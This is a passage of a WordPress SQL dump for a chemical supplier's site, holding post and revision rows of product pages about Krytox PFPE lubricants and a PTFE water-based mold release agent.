not combustible, nor do they ignite.\r\n\r\n<strong>How stable is Krytox when exposed to chemicals?</strong>\r\n\r\nKrytox PFPE oils and greases thickened with PTFE exhibit exceptional chemical stability. Krytox oils and greases will not react with most chemicals (with the exception of Lewis acids and alkali metals) and other\r\nlubricants, nor cause them to degrade. Krytox performance lubricants are not only resistant to oxygen and reactive gases, but they are inert to virtually all chemicals commonly used in most industries. For further information, please ask for “Krytox Lubricants: Chemical Stability.”\r\n\r\n<strong>Is Krytox compatible with nonmetallic materials?</strong>\r\n\r\nYes. Krytox oils and greases have been used as plastic or elastomer component lubricants for over 40 years. For more specific information, please ask for “Krytox Lubricants Plastics and Elastomer Compatibility.”\r\n\r\n<strong>Is Krytox oil hard to clean up?</strong>\r\n\r\nThe very characteristic that makes Krytox lubricant work as well as it does, i.e., its inertness to chemical attack, also makes it insoluble in most common solvents and is why it cannot be washed out with water. A small amount of a fluorinated solvent such as Krytox Solvent, Krytox HC Plus Cleaner, or Vertrel XF on a rag or towel will easily remove remaining traces of Krytox. For additional information, please request “Krytox HC Plus Cleaner” and “Krytox Solvent.”\r\n\r\n<strong>What is the shelf life of Krytox lubricants?</strong>\r\n\r\nKrytox greases and oils with no additives have an indefinite shelf life if left unopened and stored in a clean, dry location. The service life of Krytox is difficult to predict because there are so many variables. Testing\r\ndocuments Krytox grease at 200 ºC (392 °F) and 10,000 rpm for over 5,000 hours in an ASTM D3336 life test, and the bearings did not fail. For more detailed information, please ask for “Shelf Life Profile of Krytox\r\nLubricants.”\r\n\r\n<strong>What lubrication equipment can I use with Krytox grease?</strong>\r\n\r\nGenerally, any lubrication equipment manufacturer’s gun or pump that fits a standard grease cartridge or grease bucket should work. For more information about equipment grades and a discussion of grease fittings,\r\nplease ask for “Equipment Selection for Applying Krytox Lubricants.”\r\n\r\nThis Krytox FAQ is for educational purposes. To find your appropriate grade of Krytox please contact us or <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">click here to visit our Krytox database.</a>', 'Krytox Frequently Asked Questions (FAQ)', '', 'inherit', 'closed', 'closed', '', '2277-revision-v1', '', '', '2016-10-06 14:47:03', '2016-10-06 14:47:03', '', 2277, 'https://www.miller-stephenson.com/2277-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2316, 3, '2017-06-05 12:37:48', '2017-06-05 12:37:48', '<h2>MS-145W | Water-based Mold Release Agents</h2>\n<h3>Sub-micron PTFE; Excepti</h3>\nMiller-Stephenson\'s PTFE Water-based Mold Release Agents MS-145W,  utilizes sub 1.0 micron PTFE (polytetrafluoroethylene) particles to impart superior lubricity, surface adhesion and durability, and outstanding mold release efficiency. The unmatched lubricity and extremely low coefficient of friction has been optimized for hot mold application (&gt;190 F / 88 C). The formulation has been further enhanced with proprietary surface activation chemistry to increase adhesion of the PTFE to the molding surface.  The result is a water-based release agent that is very cost-effective, maximizing releases per application and decreasing down-time. Benefits of this product include:\n<ul>\n 	<li>Water-based Release Agent ; Hot mold optimized</li>\n 	<li>Enhanced surface adhesion; Maximized durability</li>\n 	<li>Excellent release of all polymer types</li>\n 	<li>Non-flammable; No VOC; No GWP</li>\n</ul>\nMiller-Stephenson has been developing PTFE Water-based Mold Release Agents for over 40 years.  This class of release agent yields a uniform, dry film on the mold surface while also offering superior surface adhesion and durability.  PTFE Water-based Mold Release Agents typically can last numerous molding cycles before re-application is necessary, and is ideal for compression and transfer molding operations.  One drawback is its relatively poor performance in injection molding, which requires surface slip that PTFE dry films cannot achieve. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with the sensitive electronics.\n\nProduction engineers will typically choose PTFE-based release agents if they are looking for a dry film, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates, specifically for rubber to metal bonding. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial-based alternatives.  Miller-Stephenson’s MS-145W and ReleaSys 8200 are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\n\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>', 'MS-145W | Water-based Mold Release Agents', 'Miller-Stephenson&#039;s PTFE release agent is a water-based formulation which utilizes sub 1.0 micron PTFE (polytetrafluoroethylene) particles to impart superior lubricity, surface adhesion and durability, and outstanding mold release efficiency. The outstanding lubricity and extremely low coefficient of friction of this water based PTFE has been optimized for hot mold application (&gt;190 F / 88 C). The formulation has been further enhanced with proprietary surface activation chemistry to increase adhesion of the PTFE to the molding surface.  The result is a water-based release agent that is very cost-effective by maximizing releases per application and decreasing down-time. Benefits of this product include:\n<ul>\n 	<li>Water-based formulation; Hot mold optimized</li>\n 	<li>Enhanced surface adhesion; Maximized durability</li>\n 	<li>Excellent release of all polymer types</li>\n 	<li>Non-flammable; No VOC; No GWP</li>\n</ul>', 'inherit', 'closed', 'closed', '', '2312-autosave-v1', '', '', '2017-06-05 12:37:48', '2017-06-05 12:37:48', '', 2312, 'https://www.miller-stephenson.com/2312-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2317, 2, '2016-10-06 15:56:55', '2016-10-06 15:56:55', '<h4><strong>Which Krytox product is right for your application?</strong></h4>\r\nKrytox product(s) are perfluoropolyether oils and greases are available in a variety of grades for many types of applications. This Product Selection Guide provides general properties and cites the technical data reference document where additional information can be found. “Krytox Performance Lubricants Product Overview” gives basic information about all of the grades.\r\n\r\nTypical Krytox product lubricant applications include: paint plant conveyor bearings, corrugator and paper machine bearings, robotics, welding machines, high temperature fans, textile equipment, tenter frames, high temperature ovens, conveyor systems in glass and aluminum plants, textile calendar roll bearings, brick kiln car bearings, valve lubrication, ventilation fan bearings, rod mills, valves, valve actuators, automobile\r\nalternators, viscous fan clutches, pumps, sealed-forlife bearings, critical equipment where failure cannot be tolerated, and severe service applications.\r\n<h4><strong>Krytox General-Purpose Oils and Greases</strong></h4>\r\nThe Krytox GPL 10X oil /20X grease series contains no additives and can be used on components that may come in contact with all chemicals, including acids, bases, solvents, and other reactive chemicals. Typical applications include valves, bearings, seal barrier fluids, instruments, and oxygen systems.\r\n\r\nThe Krytox GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications.\r\n\r\nThe Krytox GPL 22X series contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments. Typical applications include automotive bearings, sealed pump bearings, electric motor bearings, and general-purpose bearings.\r\n\r\nKrytox GPL 29X greases have EP and anti-corrosion additives, and have been formulated for applications that need both high load carrying capacity and anti-corrosion protection. For additional information, refer to “Krytox Lubricants for Extreme Pressure Applications with Anti- Corrosion Additives.”\r\n\r\nKrytox GPL 2EX lubricants are formulated using new antirust additives. This grease is similar to Krytox GPL 22X series greases, but contains a non-nitrite anti-corrosion additive. For further information, refer to “Krytox Extra High Temperature (XHT) Products.”\r\n<h4><strong>Krytox Lubricants for Aerospace Applications</strong></h4>\r\nKrytox 143 series oils are clear, colorless, fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and are long lasting.\r\n\r\nKrytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but in a grease form. Krytox 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specification.\r\n<h4><strong>Krytox Vacuum Pump Fluids</strong></h4>\r\nKrytox vacuum pump fluids are used in vacuum pumps and vacuum systems where controlled vapor pressure, nonflammability, and non-reactivity are needed. Krytox vacuum pump fluids can be regenerated and reused.\r\n<h4><strong>Krytox Extra High Temperature Products</strong></h4>\r\nKrytox XHT- S and XHT-SX greases are high temperature greases. These greases are designed to work best at temperatures over 204 °C (400 °F), but below 300 °C (572 °F). For more specific information, refer to\r\n“Krytox XHT Grease.”\r\n\r\nKrytox XHT- AC and XHT-ACX greases are high temperature greases that contain anti-corrosion/anti-wear inhibitors. These greases are designed to work best at temperatures over 204 °C (400 °F), but under 300 °C (572 °F).\r\n\r\nKrytox XHT- BD, XHT-BDX, and XHT-BDZ greases are designed for use where temperatures are in the 288–399 °C (550–750 °F) range and there is a danger of melting the standard PTFE thickener. These greases use a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The grease is slightly tacky, and it will coat the surface and stay in place. For additional information, refer to “Krytox XHT Grease with Special Non-Melting Thickener.”\r\n<h4><strong>Krytox Lubricant Specialty Products</strong></h4>\r\nSpecialty products include:\r\n<ul>\r\n 	<li>H-1 rated food grade lubricants (discussed in more detail in “Krytox General-Purpose Greases and Oils”)</li>\r\n 	<li>Krytox NRT lubricants for oxygen systems and reactivegases</li>\r\n 	<li>Krytox XP lubricants with soluble additives</li>\r\n 	<li>Wide temperature range, high vacuum linear PFPE products</li>\r\n</ul>\r\n<h4><strong>Other Considerations</strong></h4>\r\nMany factors affect the performance of a grease and bearing, and those factors can affect grease and component life as well. Standard grease consistency is NLGI Grade 2 penetration. Sometimes, a harder Grade 3 grease or softer Grade 1 grease is needed and can be ordered. For example, softer Grade 00 or 0 greases are often used in gearboxes. In bearing applications, different types of bearings place different stresses on grease; ball bearings cause little stress, whereas roller bearings will tend to grind and work the grease severely. This stress can shorten grease life and require more frequent re-lubrication or result in the need for more viscous base oil in the grease. This Product Selection Guide is a starting point to help in the selection of the Krytox lubricant suitable for your tough applications.\r\n<h4><strong>To view our line of Krytox products see below:</strong></h4>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\nTo learn more about Krytox product(s) please <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">click here.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox Product Selection Guide', '', 'publish', 'closed', 'closed', '', 'krytox-product-selection-guide', '', '', '2016-10-12 19:53:11', '2016-10-12 19:53:11', '', 0, 'https://www.miller-stephenson.com/?p=2317', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2318, 3, '2016-10-06 15:02:56', '2016-10-06 15:02:56', '', 'PTFE Water-based Mold Release Agents', '', 'inherit', 'closed', 'closed', '', 'shutterstock_72669607', '', '', '2016-11-23 19:04:08', '2016-11-23 19:04:08', '', 2312, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_72669607.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2319, 0, '2016-10-06 15:13:29', '2016-10-06 15:13:29', '', '', '', 'publish', 'closed', 'closed', '', '2319', '', '', '2016-10-06 15:13:29', '2016-10-06 15:13:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/2319/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2320, 2, '2016-10-06 15:56:21', '2016-10-06 15:56:21', '', 'Krytox Product', '', 'inherit', 'closed', 'closed', '', 'shutterstock_419810209', '', '', '2016-10-06 15:56:46', '2016-10-06 15:56:46', '', 2317, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_419810209.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2321, 2, '2016-10-06 15:56:55', '2016-10-06 15:56:55', '<strong>Which Krytox product is right for your application?</strong>\r\n\r\nKrytox product(s) are perfluoropolyether oils and greases are available in a variety of grades for many types of applications. This Product Selection Guide provides general properties and cites the technical data reference document where additional information can be found. “Krytox Performance Lubricants Product Overview” gives basic information about all of the grades.\r\nTypical Krytox product lubricant applications include: paint plant conveyor bearings, corrugator and paper machine bearings, robotics, welding machines, high temperature fans, textile equipment, tenter frames, high temperature ovens, conveyor systems in glass and aluminum plants, textile calendar roll bearings, brick kiln car bearings, valve lubrication, ventilation fan bearings, rod mills, valves, valve actuators, automobile\r\nalternators, viscous fan clutches, pumps, sealed-forlife bearings, critical equipment where failure cannot be tolerated, and severe service applications.\r\n\r\n<strong>Krytox General-Purpose Oils and Greases</strong>\r\n\r\nThe Krytox GPL 10X oil /20X grease series contains no additives and can be used on components that may come in contact with all chemicals, including acids, bases, solvents, and other reactive chemicals. Typical applications include valves, bearings, seal barrier fluids, instruments, and oxygen systems.\r\n\r\nThe Krytox GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications.\r\n\r\nThe Krytox GPL 22X series contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments. Typical applications include automotive bearings, sealed pump bearings, electric motor bearings, and general-purpose bearings.\r\n\r\nKrytox GPL 29X greases have EP and anti-corrosion additives, and have been formulated for applications that need both high load carrying capacity and anti-corrosion protection. For additional information, refer to “Krytox Lubricants for Extreme Pressure Applications with Anti- Corrosion Additives.”\r\n\r\nKrytox GPL 2EX lubricants are formulated using new antirust additives. This grease is similar to Krytox GPL 22X series greases, but contains a non-nitrite anti-corrosion additive. For further information, refer to “Krytox Extra High Temperature (XHT) Products.”\r\n\r\n<strong>Krytox Lubricants for Aerospace Applications</strong>\r\n\r\nKrytox 143 series oils are clear, colorless, fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and are long lasting.\r\n\r\nKrytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but in a grease form. Krytox 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specification.\r\n\r\n<strong>Krytox Vacuum Pump Fluids</strong>\r\n\r\nKrytox vacuum pump fluids are used in vacuum pumps and vacuum systems where controlled vapor pressure, nonflammability, and non-reactivity are needed. Krytox vacuum pump fluids can be regenerated and reused.\r\n\r\n<strong>Krytox Extra High Temperature Products</strong>\r\n\r\nKrytox XHT- S and XHT-SX greases are high temperature greases. These greases are designed to work best at temperatures over 204 °C (400 °F), but below 300 °C (572 °F). For more specific information, refer to\r\n“Krytox XHT Grease.”\r\n\r\nKrytox XHT- AC and XHT-ACX greases are high temperature greases that contain anti-corrosion/anti-wear inhibitors. These greases are designed to work best at temperatures over 204 °C (400 °F), but under 300 °C (572 °F).\r\n\r\nKrytox XHT- BD, XHT-BDX, and XHT-BDZ greases are designed for use where temperatures are in the 288–399 °C (550–750 °F) range and there is a danger of melting the standard PTFE thickener. These greases use a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The grease is slightly tacky, and it will coat the surface and stay in place. For additional information, refer to “Krytox XHT Grease with Special Non-Melting Thickener.”\r\n\r\n<strong>Krytox Lubricant Specialty Products</strong>\r\n\r\nSpecialty products include:\r\n<ul>\r\n 	<li>H-1 rated food grade lubricants (discussed in more detail in “Krytox General-Purpose Greases and Oils”)</li>\r\n 	<li>Krytox NRT lubricants for oxygen systems and reactivegases</li>\r\n 	<li>Krytox XP lubricants with soluble additives</li>\r\n 	<li>Wide temperature range, high vacuum linear PFPE products</li>\r\n</ul>\r\n<strong>Other Considerations</strong>\r\n\r\nMany factors affect the performance of a grease and bearing, and those factors can affect grease and component life as well. Standard grease consistency is NLGI Grade 2 penetration. Sometimes, a harder Grade 3 grease or softer Grade 1 grease is needed and can be ordered. For example, softer Grade 00 or 0 greases are often used in gearboxes. In bearing applications, different types of bearings place different stresses on grease; ball bearings cause little stress, whereas roller bearings will tend to grind and work the grease severely. This stress can shorten grease life and require more frequent re-lubrication or result in the need for more viscous base oil in the grease. This Product Selection Guide is a starting point to help in the selection of the Krytox lubricant suitable for your tough applications.\r\n\r\nTo learn more about Krytox product(s) please <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">click here.</a>', 'Krytox Product Selection Guide', '', 'inherit', 'closed', 'closed', '', '2317-revision-v1', '', '', '2016-10-06 15:56:55', '2016-10-06 15:56:55', '', 2317, 'https://www.miller-stephenson.com/2317-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2322, 2, '2016-10-06 17:14:51', '2016-10-06 17:14:51', '<strong>Krytox Steam Control Valve Lubricant</strong>\r\n\r\n<strong>Krytox grease meets the need for a continuous lubrication cycle.</strong>\r\n\r\n<strong>Steam control valve lubricant application at a geothermal power plant</strong>\r\n\r\nThe power plant, located in Iceland, utilizes hot steam from the earth, containing 1–4% gas, mostly carbon dioxide and hydrogen disulfide, in temperatures ranging from 120–200 ºC (248–392 °F). A standard hydrocarbon-based grease was unsatisfactory for lubricating bushings for valves that control the flow of high temperature steam containing corrosive gases.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nThe geothermal power plant needed a steam control valve lubricant that:\r\n<ul>\r\n 	<li>Is able to withstand presence of acidic gases in high temperature steam</li>\r\n 	<li>Has low friction for accurate control of the valve position</li>\r\n 	<li>Can work in a self-greasing system</li>\r\n</ul>\r\n<img class="alignnone wp-image-2323" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Steam-Control-Valve-800x331.jpg" alt="steam-control-valve" width="682" height="282" />\r\n\r\n<strong>The Solution</strong>\r\n\r\nKrytox GPL 206 grease met the challenge for lubrication of the steam valve bushing. It provided the low static friction and no stick-slip that is required for accurate position control. Krytox GPL 206, like all Krytox oils and greases, can withstand very high temperatures, is nonflammable, inert, and has a low environmental footprint. The power plant now enjoys reduced maintenance, thanks to high performance Krytox lubricants—standing up to tough conditions.\r\n\r\n<strong>Other Valve Applications</strong>\r\n<ul>\r\n 	<li>Any valve-handling that could react with, degrade, or dissolve standard lubricants. Examples include:</li>\r\n 	<li>Steam</li>\r\n 	<li>Aggressive/reactive gases</li>\r\n 	<li>Chemicals</li>\r\n</ul>\r\nFluorinated lubricants from Chemours can also be used successfully in other types of applications. These synthetic oils and greases are ideal for many conditions, such as:\r\n<ul>\r\n 	<li>Continuous high temperatures up to 288ºC (550 °F)</li>\r\n 	<li>Use around hazardous chemicals</li>\r\n 	<li>Need for low friction coefficient</li>\r\n 	<li>Where flammability is a concern, including reactive gases and oxygen service</li>\r\n</ul>\r\n[product id="790"]\r\n\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-206/">Learn more about the Krytox GPL 206 here.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox For Steam Control Valves', '', 'publish', 'closed', 'closed', '', 'steam-control-valve-lubricant', '', '', '2016-10-12 19:53:06', '2016-10-12 19:53:06', '', 0, 'https://www.miller-stephenson.com/?p=2322', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2323, 2, '2016-10-06 16:54:12', '2016-10-06 16:54:12', '', 'steam-control-valve', '', 'inherit', 'closed', 'closed', '', 'steam-control-valve', '', '', '2016-10-06 16:54:12', '2016-10-06 16:54:12', '', 2322, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/Steam-Control-Valve.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2324, 2, '2016-10-06 17:03:47', '2016-10-06 17:03:47', '', 'Steam Control Valve Lubricant', '', 'inherit', 'closed', 'closed', '', 'shutterstock_317927645', '', '', '2016-10-06 17:05:08', '2016-10-06 17:05:08', '', 2322, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_317927645.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2325, 2, '2016-10-06 17:14:51', '2016-10-06 17:14:51', '<strong>Krytox Steam Control Valve Lubricant</strong>\r\n\r\n<strong>Krytox grease meets the need for a continuous lubrication cycle.</strong>\r\n\r\n<strong>Steam control valve lubricant application at a geothermal power plant</strong>\r\n\r\nThe power plant, located in Iceland, utilizes hot steam from the earth, containing 1–4% gas, mostly carbon dioxide and hydrogen disulfide, in temperatures ranging from 120–200 ºC (248–392 °F). A standard hydrocarbon-based grease was unsatisfactory for lubricating bushings for valves that control the flow of high temperature steam containing corrosive gases.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nThe geothermal power plant needed a steam control valve lubricant that:\r\n<ul>\r\n 	<li>Is able to withstand presence of acidic gases in high temperature steam</li>\r\n 	<li>Has low friction for accurate control of the valve position</li>\r\n 	<li>Can work in a self-greasing system</li>\r\n</ul>\r\n<img class="alignnone  wp-image-2323" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Steam-Control-Valve-800x331.jpg" alt="steam-control-valve" width="682" height="282" />\r\n\r\n<strong>The Solution</strong>\r\n\r\nKrytox GPL 206 grease met the challenge for lubrication of the steam valve bushing. It provided the low static friction and no stick-slip that is required for accurate position control. Krytox GPL 206, like all Krytox oils and greases, can withstand very high temperatures, is nonflammable, inert, and has a low environmental footprint. The power plant now enjoys reduced maintenance, thanks to high performance Krytox lubricants—standing up to tough conditions.\r\n\r\n<strong>Other Valve Applications</strong>\r\n<ul>\r\n 	<li>Any valve-handling that could react with, degrade, or dissolve standard lubricants. Examples include:</li>\r\n 	<li>Steam</li>\r\n 	<li>Aggressive/reactive gases</li>\r\n 	<li>Chemicals</li>\r\n</ul>\r\nFluorinated lubricants from Chemours can also be used successfully in other types of applications. These synthetic oils and greases are ideal for many conditions, such as:\r\n<ul>\r\n 	<li>Continuous high temperatures up to 288 ºC (550 °F)</li>\r\n 	<li>Use around hazardous chemicals</li>\r\n 	<li>Need for low friction coefficient</li>\r\n 	<li>Where flammability is a concern, including reactive gases and oxygen service</li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Krytox For Steam Control Valves', '', 'inherit', 'closed', 'closed', '', '2322-revision-v1', '', '', '2016-10-06 17:14:51', '2016-10-06 17:14:51', '', 2322, 'https://www.miller-stephenson.com/2322-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2326, 2, '2016-10-06 17:23:15', '2016-10-06 17:23:15', '<strong>Krytox Steam Control Valve Lubricant</strong>\n\n<strong>Krytox grease meets the need for a continuous lubrication cycle.</strong>\n\n<strong>Steam control valve lubricant application at a geothermal power plant</strong>\n\nThe power plant, located in Iceland, utilizes hot steam from the earth, containing 1–4% gas, mostly carbon dioxide and hydrogen disulfide, in temperatures ranging from 120–200 ºC (248–392 °F). A standard hydrocarbon-based grease was unsatisfactory for lubricating bushings for valves that control the flow of high temperature steam containing corrosive gases.\n\n<strong>The Challenge</strong>\n\nThe geothermal power plant needed a steam control valve lubricant that:\n<ul>\n 	<li>Is able to withstand presence of acidic gases in high temperature steam</li>\n 	<li>Has low friction for accurate control of the valve position</li>\n 	<li>Can work in a self-greasing system</li>\n</ul>\n<img class="alignnone wp-image-2323" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Steam-Control-Valve-800x331.jpg" alt="steam-control-valve" width="682" height="282" />\n\n<strong>The Solution</strong>\n\nKrytox GPL 206 grease met the challenge for lubrication of the steam valve bushing. It provided the low static friction and no stick-slip that is required for accurate position control. Krytox GPL 206, like all Krytox oils and greases, can withstand very high temperatures, is nonflammable, inert, and has a low environmental footprint. The power plant now enjoys reduced maintenance, thanks to high performance Krytox lubricants—standing up to tough conditions.\n\n<strong>Other Valve Applications</strong>\n<ul>\n 	<li>Any valve-handling that could react with, degrade, or dissolve standard lubricants. Examples include:</li>\n 	<li>Steam</li>\n 	<li>Aggressive/reactive gases</li>\n 	<li>Chemicals</li>\n</ul>\nFluorinated lubricants from Chemours can also be used successfully in other types of applications. These synthetic oils and greases are ideal for many conditions, such as:\n<ul>\n 	<li>Continuous high temperatures up to 288ºC (550 °F)</li>\n 	<li>Use around hazardous chemicals</li>\n 	<li>Need for low friction coefficient</li>\n 	<li>Where flammability is a concern, including reactive gases and oxygen service</li>\n</ul>\nLearn more about the K\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;', 'Krytox For Steam Control Valves', '', 'inherit', 'closed', 'closed', '', '2322-autosave-v1', '', '', '2016-10-06 17:23:15', '2016-10-06 17:23:15', '', 2322, 'https://www.miller-stephenson.com/2322-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2327, 2, '2016-10-06 17:23:31', '2016-10-06 17:23:31', '<strong>Krytox Steam Control Valve Lubricant</strong>\r\n\r\n<strong>Krytox grease meets the need for a continuous lubrication cycle.</strong>\r\n\r\n<strong>Steam control valve lubricant application at a geothermal power plant</strong>\r\n\r\nThe power plant, located in Iceland, utilizes hot steam from the earth, containing 1–4% gas, mostly carbon dioxide and hydrogen disulfide, in temperatures ranging from 120–200 ºC (248–392 °F). A standard hydrocarbon-based grease was unsatisfactory for lubricating bushings for valves that control the flow of high temperature steam containing corrosive gases.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nThe geothermal power plant needed a steam control valve lubricant that:\r\n<ul>\r\n 	<li>Is able to withstand presence of acidic gases in high temperature steam</li>\r\n 	<li>Has low friction for accurate control of the valve position</li>\r\n 	<li>Can work in a self-greasing system</li>\r\n</ul>\r\n<img class="alignnone wp-image-2323" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Steam-Control-Valve-800x331.jpg" alt="steam-control-valve" width="682" height="282" />\r\n\r\n<strong>The Solution</strong>\r\n\r\nKrytox GPL 206 grease met the challenge for lubrication of the steam valve bushing. It provided the low static friction and no stick-slip that is required for accurate position control. Krytox GPL 206, like all Krytox oils and greases, can withstand very high temperatures, is nonflammable, inert, and has a low environmental footprint. The power plant now enjoys reduced maintenance, thanks to high performance Krytox lubricants—standing up to tough conditions.\r\n\r\n<strong>Other Valve Applications</strong>\r\n<ul>\r\n 	<li>Any valve-handling that could react with, degrade, or dissolve standard lubricants. Examples include:</li>\r\n 	<li>Steam</li>\r\n 	<li>Aggressive/reactive gases</li>\r\n 	<li>Chemicals</li>\r\n</ul>\r\nFluorinated lubricants from Chemours can also be used successfully in other types of applications. These synthetic oils and greases are ideal for many conditions, such as:\r\n<ul>\r\n 	<li>Continuous high temperatures up to 288ºC (550 °F)</li>\r\n 	<li>Use around hazardous chemicals</li>\r\n 	<li>Need for low friction coefficient</li>\r\n 	<li>Where flammability is a concern, including reactive gases and oxygen service</li>\r\n</ul>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-206/">Learn more about the Krytox GPL 206 here.</a>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Krytox For Steam Control Valves', '', 'inherit', 'closed', 'closed', '', '2322-revision-v1', '', '', '2016-10-06 17:23:31', '2016-10-06 17:23:31', '', 2322, 'https://www.miller-stephenson.com/2322-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2328, 2, '2016-10-06 17:23:59', '2016-10-06 17:23:59', '<strong>Krytox Steam Control Valve Lubricant</strong>\r\n\r\n<strong>Krytox grease meets the need for a continuous lubrication cycle.</strong>\r\n\r\n<strong>Steam control valve lubricant application at a geothermal power plant</strong>\r\n\r\nThe power plant, located in Iceland, utilizes hot steam from the earth, containing 1–4% gas, mostly carbon dioxide and hydrogen disulfide, in temperatures ranging from 120–200 ºC (248–392 °F). A standard hydrocarbon-based grease was unsatisfactory for lubricating bushings for valves that control the flow of high temperature steam containing corrosive gases.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nThe geothermal power plant needed a steam control valve lubricant that:\r\n<ul>\r\n 	<li>Is able to withstand presence of acidic gases in high temperature steam</li>\r\n 	<li>Has low friction for accurate control of the valve position</li>\r\n 	<li>Can work in a self-greasing system</li>\r\n</ul>\r\n<img class="alignnone wp-image-2323" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Steam-Control-Valve-800x331.jpg" alt="steam-control-valve" width="682" height="282" />\r\n\r\n<strong>The Solution</strong>\r\n\r\nKrytox GPL 206 grease met the challenge for lubrication of the steam valve bushing. It provided the low static friction and no stick-slip that is required for accurate position control. Krytox GPL 206, like all Krytox oils and greases, can withstand very high temperatures, is nonflammable, inert, and has a low environmental footprint. The power plant now enjoys reduced maintenance, thanks to high performance Krytox lubricants—standing up to tough conditions.\r\n\r\n<strong>Other Valve Applications</strong>\r\n<ul>\r\n 	<li>Any valve-handling that could react with, degrade, or dissolve standard lubricants. Examples include:</li>\r\n 	<li>Steam</li>\r\n 	<li>Aggressive/reactive gases</li>\r\n 	<li>Chemicals</li>\r\n</ul>\r\nFluorinated lubricants from Chemours can also be used successfully in other types of applications. These synthetic oils and greases are ideal for many conditions, such as:\r\n<ul>\r\n 	<li>Continuous high temperatures up to 288ºC (550 °F)</li>\r\n 	<li>Use around hazardous chemicals</li>\r\n 	<li>Need for low friction coefficient</li>\r\n 	<li>Where flammability is a concern, including reactive gases and oxygen service</li>\r\n</ul>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-206/">Learn more about the Krytox GPL 206 here.</a>', 'Krytox For Steam Control Valves', '', 'inherit', 'closed', 'closed', '', '2322-revision-v1', '', '', '2016-10-06 17:23:59', '2016-10-06 17:23:59', '', 2322, 'https://www.miller-stephenson.com/2322-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2329, 0, '2016-10-06 17:38:09', '2016-10-06 17:38:09', '', '', '', 'publish', 'closed', 'closed', '', '2329', '', '', '2016-10-06 17:38:10', '2016-10-06 17:38:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/2329/', 0, 'nf_sub', '', 0); 
